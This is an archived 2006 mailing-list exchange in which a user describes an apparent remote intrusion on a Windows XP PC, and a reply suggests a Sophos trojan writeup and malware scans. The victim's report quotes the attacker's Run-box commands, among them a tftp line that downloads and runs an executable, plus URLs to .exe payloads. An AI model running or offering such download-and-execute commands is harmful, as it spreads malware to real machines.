On 10/5/06, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?

Some variant of:

http://www.sophos.com/security/analyses/trojtofgerb.html ?

Try a free trial of PCdefense...

http://www.laplink.com/pcdefense/

Run all the scans as you appear to be infected with something.

Orin.

--
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist